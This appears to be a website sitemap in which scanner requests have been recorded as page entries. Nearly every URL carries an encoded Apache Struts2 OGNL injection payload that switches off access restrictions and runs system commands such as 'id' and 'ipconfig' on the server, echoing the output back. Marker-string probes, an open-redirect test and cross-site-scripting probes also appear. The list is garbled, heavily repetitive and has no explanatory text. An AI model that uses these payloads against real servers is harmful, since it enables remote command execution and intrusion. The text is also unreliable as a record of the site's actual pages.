http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3fmethod%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=nbf8t%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%3f_002_product.html%3fmethod%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=jo17b%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fxsstest%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fredirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fmethod%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=ey86a%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%27_002_product.html%3f%24%7b100002-1%2b%27anonymous_%27%2b%27security_s2015_test%27%7d.action? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fclass.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fuser.action%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fredirect%3ahttp%3a%2f%2fwww.anonymous.com%2f%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?xsstest? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3fdebug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%27_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3fredirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()))%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_016f8152-c843-41f8-9cb2-efec610ef1ea_002_product.html%3ftest=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d%3f? 0.5 2024-04-30 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 